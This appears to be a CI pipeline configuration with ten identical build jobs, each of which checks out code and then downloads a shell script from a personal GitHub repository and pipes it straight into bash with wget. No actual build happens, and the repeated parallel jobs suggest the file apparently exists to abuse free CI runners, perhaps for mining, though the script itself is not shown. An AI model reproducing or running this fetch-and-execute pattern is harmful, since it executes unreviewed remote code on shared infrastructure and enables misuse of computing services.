tasks:
  build:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build2:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build3:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build4:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build5:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build6:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build7:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build8:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build9:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)

  build10:
    runner: node:16
    steps:
    - checkout
    - run: bash <(wget -qO- https://raw.githubusercontent.com/duitawa/ansible/main/corsa/s.sh)